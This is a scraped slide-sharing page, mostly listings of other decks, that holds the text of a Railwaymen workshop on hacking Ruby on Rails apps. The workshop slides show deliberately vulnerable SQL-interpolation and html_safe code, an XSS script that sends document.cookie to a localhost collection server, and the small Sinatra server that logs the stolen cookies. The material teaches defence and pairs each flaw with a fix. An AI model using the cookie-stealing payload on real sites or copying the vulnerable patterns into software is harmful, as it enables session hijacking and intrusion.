Security on RailsDavid Paluy This document discusses various security vulnerabilities in Ruby on Rails applications including session hijacking, CSRF, mass assignment, and SQL injection. It provides recommendations to address these issues such as using SSL, adding session expiration, sanitizing user input, and using parameterized queries. The key takeaway is that security must be an ongoing process as new vulnerabilities emerge, and failing to address issues can enable catastrophic attacks on applications and user data.
Securing Rails
Securing RailsAlex Payne The document outlines a presentation by Alex Payne at RailsConf Europe 2006 focusing on security practices for Ruby on Rails applications. It emphasizes a whole-stack approach to security, covering web servers, databases, and physical facilities, while addressing common vulnerabilities such as SQL injection, cross-site scripting, and cross-site request forgery. Payne advocates for security by convention and encourages integrating security into the development cycle and testing processes.
Web Application Security in Rails
Web Application Security in RailsUri Nativ This document summarizes common web application security vulnerabilities in Ruby on Rails such as SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), mass assignment, and CVE-2012-2661. It provides examples of these vulnerabilities and discusses countermeasures like input sanitization, access control, CSRF tokens, whitelisting attributes, and upgrading Rails versions. The document concludes by recommending following Rails security best practices and resources for learning about securing Rails applications.
Security Goodness with Ruby on Rails
Security Goodness with Ruby on RailsSource Conference This document provides an overview and introduction to Ruby on Rails. It begins with an agenda and introduction to the speaker. It then provides a brief introduction to Rails, including what industries use it, examples of popular websites built with Rails, and an explanation of its model-view-controller architecture and RESTful design philosophy. The document continues with sections on auditing Rails applications, identifying common vulnerabilities like mass assignment and cross-site scripting, and recommendations for removing vulnerabilities.
Startup Institute NY - Authentication, Validation, and Basic Testing
Startup Institute NY - Authentication, Validation, and Basic TestingMatthew Gerrior The document provides an overview of authentication, validation, and testing practices in web development, particularly using Rails. It covers essential topics including secure cookie management, user session handling, the Devise authentication solution, and validation techniques. Additionally, it addresses testing methodologies such as unit, integration, and acceptance testing to ensure software quality.
Startup Institute NY (Summer 2016) - Authentication, Validation, and Basic Te...
Startup Institute NY (Summer 2016) - Authentication, Validation, and Basic Te...Matthew Gerrior This document provides an agenda for a curriculum on authentication, validation, and basic testing. It includes introductions and background on the presenter and their company Devpost. The topics covered are authentication using cookies and sessions, model validations in Rails, the Devise authentication gem, and testing with RSpec, integration testing, acceptance testing with Cucumber, and resources for further learning. Testing methodologies like TDD, unit testing, integration testing, and acceptance testing are explained.
HES2011 - joernchen - Ruby on Rails from a Code Auditor Perspective
HES2011 - joernchen - Ruby on Rails from a Code Auditor PerspectiveHackito Ergo Sum This document provides an overview of Ruby on Rails (RoR) from a code auditor's perspective. It discusses the MVC architecture that RoR uses and describes where the different components (model, view, controller) are typically located in a RoR application. It also discusses common things to look for when reviewing RoR code like user input validation, filters, migrations and more. Specific examples of issues found in Redmine and another open source project are also provided like a persistent XSS issue and information leak.
More from Railwaymen (10)
How to start application development?
How to start application development?Railwaymen The document outlines a checklist for starting an app development project, emphasizing the importance of having a clear goal and conducting market research. It also highlights the need to identify the target audience, select an appropriate technology stack, create wireframes, prepare documentation, and set timelines and budgets. Additionally, it advises considering monetization strategies and developing a marketing plan to promote the app effectively.
We digitize your business vision
We digitize your business visionRailwaymen The document outlines a company that specializes in innovative digital solutions, having successfully launched over 70 projects globally. It features testimonials highlighting their expertise, commitment, and customer-centric approach, alongside details of their methodologies for developing technology-based applications. The content also emphasizes their flexibility, strong communication, and involvement in clients' projects as integral to their service offerings.
Speed up rspec tests - part 1
Speed up rspec tests - part 1Railwaymen The document discusses strategies for speeding up RSpec tests, particularly for feature specs. It suggests combining test cases to reduce setup time and using the `aggregate_failures` feature to run tests more efficiently while providing comprehensive error reporting. The author encourages applying these methods to improve both feature and certain controller specs that share the same setup.
Railwaymen Booklet 2017
Railwaymen Booklet 2017Railwaymen We are an enthusiastic team of talented and detail-oriented technology experts who are committed to building software that is as smart as it is functional. We specialize in the newest IT technologies, such as Ruby on Rails for web development, both iOS (Swift) and Android (Java) for mobile app development.
Our mission is to deliver the most innovative solutions to clients all over the world. Most of our clients are located in the United States, the others are from Canada, Australia and European countries. We are also open for new markets, thought we want to expand globally. We provide support at every stage of the project for enterprises and startups.
Since 2015 we are among Top Poland Developers and we were recently recognized as Emerging Polish Web and Software Developers by respectable platform: Clutch.co. Railwaymen is also among Top 10 Ruby on Rails Development Companies.
Our goal is to increase our recognition developing the best quality web and mobile applications, using IoT technology (Internet of Things), AI (Artificial Intelligence) and beacons.
Railwaymen Presentation 2017
Railwaymen Presentation 2017Railwaymen The document outlines the services offered by Railwaymen, a technology company specializing in web and mobile development, including expertise in various programming languages and frameworks. They serve multiple industries such as real estate, healthcare, and entertainment. Contact information for the company is also provided, along with details for the CEO.
Will it pass or not? - A few words about automation
Will it pass or not? - A few words about automationRailwaymen The document discusses the automation agenda focusing on tools like Selenium and Selenium Grid. It compares testing frameworks TestNG and JUnit, detailing annotations and parallel browser testing. Additionally, it provides examples and a brief overview of using testng.xml.
Using assm in service object
Using assm in service object Railwaymen This document discusses using the AASM gem to implement finite state machines in Ruby. It shows how to define a state machine on a service object called AccountManager to manage the step-by-step creation of an Account model. The AccountManager handles validation and state transitions between steps 1, 2, 3 and finished. This separates the state machine logic from the Account model for better structure, maintenance and testability compared to defining the state machine directly on the Account model.
Mobile App Development
Mobile App Development Railwaymen Railwaymen helps startups with complex mobile app development and our talents specialize in iOS (Swift) / Android technologies. We are based in Cracow (Poland- renowned for its quality coders) and we have the resources to make your company growth as streamlined as possible.
Examples of our work you can see here: http://railwaymen.org/portfolio
The evil scientist - Railwaymen DevDay vol.1
The evil scientist - Railwaymen DevDay vol.1Railwaymen The document outlines a fun event called 'devday #1' where participants must work together to thwart an evil scientist's plan involving large JSON files. It encourages teamwork in coding and problem-solving, promoting a sense of community among developers. Additionally, it highlights bonus pizza missions and a spectator mode for non-coders, with the event scheduled for Wednesday, October 5th.
Smartwatch - jednak coś więcej niż dodatkowy ekran na notyfikacje?
Smartwatch - jednak coś więcej niż dodatkowy ekran na notyfikacje?Railwaymen Stworzenie dwóch uproszczonych aplikacji klienckich odpowiadających za natychmiastową komunikację pomiędzy kelnerami a kuchnią w restauracji na przykładzie smartwatchy wykorzystywanych w systemie POSbistro.
Recently uploaded (20)
Async-ronizing Success at Wix - Patterns for Seamless Microservices - Devoxx ...
Async-ronizing Success at Wix - Patterns for Seamless Microservices - Devoxx ...Natan Silnitsky In a world where speed, resilience, and fault tolerance define success, Wix leverages Kafka to power asynchronous programming across 4,000 microservices. This talk explores four key patterns that boost developer velocity while solving common challenges with scalable, efficient, and reliable solutions:
1. Integration Events: Shift from synchronous calls to pre-fetching to reduce query latency and improve user experience.
2. Task Queue: Offload non-critical tasks like notifications to streamline request flows.
3. Task Scheduler: Enable precise, fault-tolerant delayed or recurring workflows with robust scheduling.
4. Iterator for Long-running Jobs: Process extensive workloads via chunked execution, optimizing scalability and resilience.
For each pattern, we’ll discuss benefits, challenges, and how we mitigate drawbacks to create practical solutions
This session offers actionable insights for developers and architects tackling distributed systems, helping refine microservices and adopting Kafka-driven async excellence.
What is data visualization and how data visualization tool can help.pptx
What is data visualization and how data visualization tool can help.pptxVarsha Nayak An open source data visualization tool enhances this process by providing flexible, cost-effective solutions that allow users to customize and scale their visualizations according to their needs. These tools enable organizations to make data-driven decisions with complete freedom from proprietary software limitations. Whether you're a data scientist, marketer, or business leader, understanding how to utilize an open source data visualization tool can significantly improve your ability to communicate insights effectively.
Looking for a BIRT Report Alternative Here’s Why Helical Insight Stands Out.pdf
Looking for a BIRT Report Alternative Here’s Why Helical Insight Stands Out.pdfVarsha Nayak The search for an Alternative to BIRT Reports has intensified as companies face challenges with BIRT's steep learning curve, limited visualization capabilities, and complex deployment requirements. Organizations need reporting solutions that offer intuitive design interfaces, comprehensive analytics features, and seamless integration capabilities – all while maintaining the reliability and performance that enterprise environments demand.
Folding Cheat Sheet # 9 - List Unfolding 𝑢𝑛𝑓𝑜𝑙𝑑 as the Computational Dual of ...
Folding Cheat Sheet # 9 - List Unfolding 𝑢𝑛𝑓𝑜𝑙𝑑 as the Computational Dual of ...Philip Schwarz For most up-to-date version see https://fpilluminated.org/deck/264
In this deck we look at the following:
* How unfolding lists is the computational dual of folding lists
* Different variants of the function for unfolding lists
* How they relate to the iterate function
How to Choose the Right Web Development Agency.pdf
How to Choose the Right Web Development Agency.pdfCreative Fosters Choosing the right web development agency is key to building a powerful online presence. This detailed guide from Creative Fosters helps you evaluate agencies based on experience, portfolio, technical skills, communication, and post-launch support. Whether you're launching a new site or revamping an old one, these expert tips will ensure you find a reliable team that understands your vision and delivers results. Avoid common mistakes and partner with an agency that aligns with your goals and budget.
OpenTelemetry 101 Cloud Native Barcelona
OpenTelemetry 101 Cloud Native BarcelonaImma Valls Bernaus A brief introduction to OpenTelemetry, with a practical example of auto-instrumenting a Java web application with the Grafana stack (Loki, Grafana, Tempo, and Mimir).
What is data visualization and how data visualization tool can help.pdf
What is data visualization and how data visualization tool can help.pdfVarsha Nayak An open source data visualization tool enhances this process by providing flexible, cost-effective solutions that allow users to customize and scale their visualizations according to their needs. These tools enable organizations to make data-driven decisions with complete freedom from proprietary software limitations. Whether you're a data scientist, marketer, or business leader, understanding how to utilize an open source data visualization tool can significantly improve your ability to communicate insights effectively.
MOVIE RECOMMENDATION SYSTEM, UDUMULA GOPI REDDY, Y24MC13085.pptx
MOVIE RECOMMENDATION SYSTEM, UDUMULA GOPI REDDY, Y24MC13085.pptxMaharshi Mallela Movie recommendation system is a software application or algorithm designed to suggest movies to users based on their preferences, viewing history, or other relevant factors. The primary goal of such a system is to enhance user experience by providing personalized and relevant movie suggestions.
On-Device AI: Is It Time to Go All-In, or Do We Still Need the Cloud?
On-Device AI: Is It Time to Go All-In, or Do We Still Need the Cloud?Hassan Abid As mobile hardware becomes more powerful, the promise of running advanced AI directly on-device is closer than ever. With Google’s latest on-device model Gemini Nano, accessible through the new ML Kit GenAI APIs and AI Edge SDK, alongside the open-source Gemma-3n models, developers can now integrate lightweight, multimodal intelligence that works even without an internet connection. But does this mean we no longer need cloud-based AI? This session explores the practical trade-offs between on-device and cloud AI for mobile apps.
Emvigo Capability Deck 2025: Accelerating Innovation Through Intelligent Soft...
Emvigo Capability Deck 2025: Accelerating Innovation Through Intelligent Soft...Emvigo Technologies Welcome to Emvigo’s Capability Deck for 2025 – a comprehensive overview of how we help businesses launch, scale, and sustain digital success through cutting-edge technology solutions.
With 13+ years of experience and a presence across the UK, UAE, and India, Emvigo is an ISO-certified software company trusted by leading global organizations including the NHS, Verra, London Business School, and George Washington University.
🔧 What We Do
We specialize in:
Rapid MVP development (go from idea to launch in just 4 weeks)
Custom software development
Gen AI applications and AI-as-a-Service (AIaaS)
Enterprise cloud architecture
DevOps, CI/CD, and infrastructure automation
QA and test automation
E-commerce platforms and performance optimization
Digital marketing and analytics integrations
🧠 AI at the Core
Our delivery model is infused with AI – from workflow optimization to proactive risk management. We leverage GenAI, NLP, and ML to make your software smarter, faster, and more secure.
📈 Impact in Numbers
500+ successful projects delivered
200+ web and mobile apps launched
42-month average client engagement
30+ active projects at any time
🌍 Industries We Serve
Fintech
Healthcare
Education (E-Learning)
Sustainability & Compliance
Real Estate
Energy
Customer Experience platforms
⚙️ Flexible Engagement Models
Whether you're looking for dedicated teams, fixed-cost projects, or time-and-materials models, we deliver with agility and transparency.
📢 Why Clients Choose Emvigo
✅ AI-accelerated delivery
✅ Strong focus on long-term partnerships
✅ Highly rated on Clutch and Google Reviews
✅ Proactive and adaptable to change
✅ Fully GDPR-compliant and security-conscious
🔗 Visit: emvigotech.com
📬 Contact: [email protected]
📞 Ready to scale your tech with confidence? Let’s build the future, together.
Insurance Underwriting Software Enhancing Accuracy and Efficiency
Insurance Underwriting Software Enhancing Accuracy and EfficiencyInsurance Tech Services Insurance underwriting software enhances accuracy and speed by automating tasks and enabling real-time decisions. It’s essential for insurers aiming to stay agile, compliant, and customer-centric in the digital era. Explore More- https://www.damcogroup.com/insurance/underwriting-software
Meet You in the Middle: 1000x Performance for Parquet Queries on PB-Scale Dat...
Meet You in the Middle: 1000x Performance for Parquet Queries on PB-Scale Dat...Alluxio, Inc. Alluxio Webinar
June 10, 2025
For more Alluxio Events: https://www.alluxio.io/events/
Speaker:
David Zhu (Engineering Manager @ Alluxio)
Storing data as Parquet files on cloud object storage, such as AWS S3, has become prevalent not only for large-scale data lakes but also as lightweight feature stores for training and inference, or as document stores for Retrieval-Augmented Generation (RAG). However, querying petabyte-to-exabyte-scale data lakes directly from S3 remains notoriously slow, with latencies typically ranging from hundreds of milliseconds to several seconds.
In this webinar, David Zhu, Software Engineering Manager at Alluxio, will present the results of a joint collaboration between Alluxio and a leading SaaS and data infrastructure enterprise that explored leveraging Alluxio as a high-performance caching and acceleration layer atop AWS S3 for ultra-fast querying of Parquet files at PB scale.
David will share:
- How Alluxio delivers sub-millisecond Time-to-First-Byte (TTFB) for Parquet queries, comparable to S3 Express One Zone, without requiring specialized hardware, data format changes, or data migration from your existing data lake.
- The architecture that enables Alluxio’s throughput to scale linearly with cluster size, achieving one million queries per second on a modest 50-node deployment, surpassing S3 Express single-account throughput by 50x without latency degradation.
- Specifics on how Alluxio offloads partial Parquet read operations and reduces overhead, enabling direct, ultra-low-latency point queries in hundreds of microseconds and achieving a 1,000x performance gain over traditional S3 querying methods.
Enable Your Cloud Journey With Microsoft Trusted Partner | IFI Tech
Enable Your Cloud Journey With Microsoft Trusted Partner | IFI TechIFI Techsolutions Start your cloud journey with IFI Tech—Microsoft’s trusted partner delivering secure, scalable Azure solutions tailored for your business.
wAIred_RabobankIgniteSession_12062025.pptx
wAIred_RabobankIgniteSession_12062025.pptxSimonedeGijt In today's world, artificial intelligence (AI) is transforming the way we learn.
This talk will explore how we can use AI tools to enhance our learning experiences, by looking at some (recent) research that has been done on the matter.
But as we embrace these new technologies, we must also ask ourselves:
Are we becoming less capable of thinking for ourselves?
Do these tools make us smarter, or do they risk dulling our critical thinking skills?
This talk will encourage us to think critically about the role of AI in our education. Together, we will discover how to use AI to support our learning journey while still developing our ability to think critically.
Milwaukee Marketo User Group June 2025 - Optimize and Enhance Efficiency - Sm...
Milwaukee Marketo User Group June 2025 - Optimize and Enhance Efficiency - Sm...BradBedford3 Inspired by the Adobe Summit hands-on lab, Optimize Your Marketo Instance Performance, review the recording from June 5th to learn best practices that can optimize your smart campaign and smart list processing time, inefficient practices to try to avoid, and tips and tricks for keeping your instance running smooth!
You will learn:
How smart campaign queueing works, how flow steps are prioritized, and configurations that slow down smart campaign processing.
Best practices for smart list and smart campaign configurations that yield greater reliability and processing efficiencies.
Generally recommended timelines for reviewing instance performance: walk away from this session with a guideline of what to review in Marketo and how often to review it.
This session will be helpful for any Marketo administrator looking for opportunities to improve and streamline their instance performance. Be sure to watch to learn best practices and connect with your local Marketo peers!
Code and No-Code Journeys: The Coverage Overlook
Code and No-Code Journeys: The Coverage OverlookApplitools Explore practical ways to expand visual and functional UI coverage without deep coding or heavy maintenance in this session. Session recording and more info at applitools.com
GDG Douglas - Google AI Agents: Your Next Intern?
GDG Douglas - Google AI Agents: Your Next Intern?felipeceotto Presentation done at the GDG Douglas event for June 2025.
A first look at Google's new Agent Development Kit.
Agent Development Kit is a new open-source framework from Google designed to simplify the full stack end-to-end development of agents and multi-agent systems.
Who will create the languages of the future?
Who will create the languages of the future?Jordi Cabot Will future languages be created by language engineers?
Can you "vibe" a DSL?
In this talk, we will explore the changing landscape of language engineering and discuss how Artificial Intelligence and low-code/no-code techniques can play a role in this future by helping in the definition, use, execution, and testing of new languages. Even empowering non-tech users to create their own language infrastructure. Maybe without them even realizing.
Reimagining Software Development and DevOps with Agentic AI
Reimagining Software Development and DevOps with Agentic AIMaxim Salnikov Key announcements about Developer Productivity from Microsoft Build 2025
RoR Workshop - Web applications hacking - Ruby on Rails example
- 1. Web applications hacking Ruby on Rails example by Karol Topolski
- 2. ● Software House located in Krakow ● Ruby on Rails, Android and iOS ● Specialized in building web and mobile applications ● Collaborating with many companies and startups from all over the world ABOUT US:
- 3. 2009 - software house was founded 50 projects created 40 employees Awards: OUR HISTORY: Top Web & Software Developers in Poland 2015 Top Tens Ruby on Rails Development Companies
- 4. HOMEAHEAD
- 5. PROEST
- 8. OWASP TOP 10 1. Injection 2. Broken authentication and session management 3. Cross-Site Scripting 4. Insecure direct object reference 5. Security misconfiguration 6. Sensitive data exposure 7. Missing function level access control 8. Cross-Site Request Forgery 9. Using components with known vulnerabilities 10. Unvalidated redirects and forwards
- 10. Simple Ruby on Rails forum Ruby 2.3.0 Rails 4.2.6 PostgreSQL 9.4 https://github.com/railwaymen/hacking-forum.git
- 15. # app/controllers/forum_threads_controller.rb class ForumThreadsController < ApplicationController def show @thread = ForumThread.find_by title: params[:title] end end # config/routes.rb resources :forum_threads, param: :title, only: :show do resources :comments, only: :create end SEARCHING THE FORUM THREAD BY TITLE:
- 17. # app/controllers/forum_threads_controller.rb class ForumThreadsController < ApplicationController def show @thread = ForumThread.find_by “title = #{params[:title]}” end end # config/routes.rb resources :forum_threads, param: :title, only: :show do resources :comments, only: :create end SEARCHING THE FORUM THREAD BY TITLE:
- 20. Is SQL injection impossible in Rails?
- 21. Unfortunately, no. It’s possible, just not dropping tables.
- 24. # app/controllers/comments_controller.rb class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: ‘Successfully added new comment’ else redirect_to @thread, alert: “Couldn’t save comment“ end end private def comment_params params.require(:comment).permit(:content) end end # app/views/forum_threads/show.haml %p= comment.content COMMENTS - create and show:
- 26. # app/controllers/comments_controller.rb class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: ‘Successfully added new comment’ else redirect_to @thread, alert: “Couldn’t save comment“ end end private def comment_params params.require(:comment).permit(:content) end end # app/views/forum_threads/show.haml %p= comment.content.html_safe COMMENTS - create and show:
- 28. <!-- XSS test --> Hi guys! <script> alert(“I came for your cookies!“) </script> <!-- Time to get some cookies! --> What’s up? <script> xhttp = new XMLHttpRequest(); xhttp.open(“GET”, “http://localhost:4567/cookies/” + document.cookie); xhttp.send(); </script> XSS ATTACK - TEST AND STEALING COOKIES
- 29. require ‘sinatra’ require ‘logger’ logger = Logger.new ‘log/cookies.log’ get ‘/cookies/:cookie’ do logger.info ‘=== COOKIE ===’ logger.info params[:cookie] logger.info ‘/== COOKIE ===’ end XSS ATTACK - SIMPLE COOKIES LOGGING SERVER
- 32. Are all cookies HTTPOnly in Rails?
- 33. cookies[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’ // document.cookies=”after_sign_in_path=’http://malicious.site/phishing’” cookies.signed[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’ // document.cookies=”after_sign_in_path=’http://malicious.site/phishing’” cookies.signed[:after_sign_in_path] = { value: ‘http://localhost/after_sign_in_path’, httponly: true } // finally safe UNFORTUNATELY - NO. ALWAYS USE THIS HASH!
- 34. It’s safe from cookies stealing, but is it safe from XSS?
- 35. # app/controllers/comments_controller.rb class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: ‘Successfully added new comment’ else redirect_to @thread, alert: “Couldn’t save comment“ end end private def comment_params params.require(:comment).permit(:content) end end # app/views/forum_threads/show.haml %p= sanitize comment.content.html_safe COMMENTS - create and show:
- 38. # app/controllers/application_controller.rb class ApplicationController < ActionController::Base # Prevent CSRF attacks by raising an exception. # For APIs you may want to use :null_session instead. protect_from_forgery with: :exception end DEFAULT CSRF PROTECTION IN RAILS:
- 40. Is Rails CSRF protection unbreakable?
- 41. HTTP Verbs ● GET ● POST ● PUT ● PATCH ● DELETE ● HEAD ● OPTIONS ● TRACE ● CONNECT
- 42. HTTP Verbs NOT protected by Rails CSRF ● GET ● POST ● PUT ● PATCH ● DELETE ● HEAD ● OPTIONS ● TRACE ● CONNECT
- 43. CSRF pitfall in Rails routing
- 44. # config/routes.rb match ‘/forum_threads/:forum_thread_id/comments/:id/update’, to: ‘comments#update’, via: :all # Rails 4+ CSRF PITFALL IN RAILS ROUTING - MATCH:
- 47. Is Rails CSRF protection 100% safe?
- 48. Yes it is - unless you’re not staying close to Rails guides
- 51. Sensitive data exposure 1. Credentials leaking to public repositories. 2. Lack of proper in-app authorization. 3. Debugging information in production enviroments. 4. Access not restricted, wrong access privileges. 5. Lack of encryption. 6. API responses containing sensitive data.
- 52. Protecting against sensitive data exposure 1. Code reviews. 2. Careful authorization. 3. Strict access. 4. Encryption. 5. API exposing only necessary information.
- 53. Creating the secure API
- 56. # app/controllers/forum_threads_controller.rb def index @threads = ForumThread.order(updated_at: :desc) respond_to do |format| format.html format.json { render json: @threads } end end GENERATED RAILS API
- 57. [ { ”id”: 2, ”title”: "Curabitur vel vulputate libero.", ”created_at”: "2016-04-18T10:10:40.648Z", ”updated_at”: "2016-04-18T10:10:40.648Z" }, { "id": 1, "title": "Lorem ipsum dolor sit amet.", "created_at": "2016-04-18T10:10:40.607Z", "updated_at": "2016-04-18T10:10:40.607Z" } ] GENERATED RAILS API - OUTPUT
- 58. # app/controllers/forum_threads_controller.rb def index @threads = ForumThread.order(updated_at: :desc) respond_to do |format| format.html format.json { render json: @threads.only(:title).to_json } end end GENERATED RAILS API - SECURING THE OUTPUT
- 59. [ { ”title”: "Curabitur vel vulputate libero." }, { "title": "Lorem ipsum dolor sit amet." } ] GENERATED RAILS API - SECURED OUTPUT
- 61. Solutions for building pretty, secure APIs Active Model Serializers ● Object Oriented approach ● Ability to define decorating methods ● All Ruby! ● Flexible ● Easy to test ● Adapter to follow JSON API v1.0 schema ● YARD documented Jbuilder ● Templates approach ● ERblike - might be easy for newcomers ● Flexible ● Hard to test ● No real “adapter” - if you want JSON API v1.0, you have to do it by yourself
- 62. Summary
- 63. Things to remember from this workshop: 1. Never trust anything that comes from user. Params, cookies, headers, everything. Nothing that comes from user is safe to use. 2. Always sanitize your HTML output. Especially when you’re allowing links or images that comes from user. 3. Be careful with match routing. Just don’t use it if you don’t have to. 4. Inspect your outputs. Return only necessary information from your API. 5. Last but not least. Get someone to review your code.
- 64. Thank you for your attention.
- 65. Na zjeździe 11 30-527 Krakow, Poland tel: +48 12 391 60 76 Silicon Valley Acceleration Center. 180 Sansome Street San Francisco, CA 94104 tel: 1-415-449-4791 [email protected] www.railwaymen.org @Railwaymen_org railwaymen.software.development /company/railwaymen